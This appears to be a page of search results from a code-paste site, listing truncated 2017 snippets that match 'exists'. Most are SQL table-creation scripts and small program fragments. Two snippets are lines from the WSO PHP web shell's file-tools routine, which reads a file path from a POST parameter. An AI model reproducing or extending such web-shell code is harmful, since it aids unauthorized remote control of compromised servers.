42.7K results in 818 ms
8 years ago · Dec 07, 2017, 03:38 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Dec 07, 2017, 03:06 AM
table for view `recordr`.`ClassificationView` -- ----------------------------------------------------- CREATE TABLE IF NOT EXISTS `recordr`.`ClassificationView` (`RecordId` INT, `ClassificationPath`
8 years ago · Dec 07, 2017, 02:30 AM
FOR INSERT, UPDATE AS IF NOT EXISTS (SELECT ClientID FROM Job)
8 years ago · Dec 07, 2017, 01:16 AM
EXISTS LOCATION; #DROP TABLE IF EXISTS DIRECTION; CREATE TABLE Location ( locationId VARCHAR(50) NOT NULL, Description VARCHAR(50) NOT
8 years ago · Dec 07, 2017, 12:30 AM
DROP TABLE IF EXISTS `tbladminusers`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `tbladminusers` ( `id` int(4)
8 years ago · Dec 07, 2017, 12:20 AM
structure for table `mayorresults` -- CREATE TABLE IF NOT EXISTS `mayorresults` ( `id` int(11) NOT
8 years ago · Dec 06, 2017, 11:26 PM
IF EXISTS " + TABLE_CONTACTS); db.execSQL("DROP TABLE IF EXISTS " + TABLE_ACTIVITY); // Create tables again onCreate(db); } // activity
8 years ago · Dec 06, 2017, 10:36 PM
DROP PROCEDURE IF EXISTS wyplata; DELIMITER $$ CREATE PROCEDURE wyplata(budzet float, zawod1
8 years ago · Dec 06, 2017, 10:22 PM
getSelection() SelectionBox.Adornee = selection end) if not success then SelectionBox.Adornee = nil
8 years ago · Dec 06, 2017, 10:08 PM
HalBrain.CheckTableExistence(Trim(LCase(UserName)) & "_Sex") = False Then 'Create table for this person if it doesn't exist HalBrain.CreateTable
8 years ago · Dec 06, 2017, 09:22 PM
var table = document.querySelector('#hero-area table.table-hero-stats'); if (!table) { return; } var statRow = table.rows.item(0);
8 years ago · Dec 06, 2017, 09:00 PM
statement changed 0 rows: CREATE TABLE IF NOT EXISTS `items` (`id` INTEGER PRIMARY
8 years ago · Dec 06, 2017, 08:50 PM
current_setting('upsert.action') AS "upsert.action"; DROP TABLE IF EXISTS tab; CREATE TABLE tab(id INT PRIMARY
8 years ago · Dec 06, 2017, 08:04 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Dec 06, 2017, 07:18 PM
printf("dialog_manager:Error: No such function exists '%s'",cond) end end end if ( act ) then if ( type(act) == "table" ) then for key, value
8 years ago · Dec 06, 2017, 07:08 PM
else: role = discord.utils.get(server.roles, name=default_name) if create and not role: perms = server.me.server_permissions if
8 years ago · Dec 06, 2017, 06:56 PM
0,0 +1,48 @@ +DROP TABLE IF EXISTS `spell_dbc`; + +CREATE TABLE `spell_dbc` ( + `Id` int(10) unsigned NOT NULL, + `Attributes` int(10) unsigned
8 years ago · Dec 06, 2017, 06:22 PM
if folder "plugins/ZAC/logs" doesn't exists: create folder "plugins/ZAC/logs" if folder "plugins/ZAC/logs/alerts" doesn't exists:
Total pages: 2134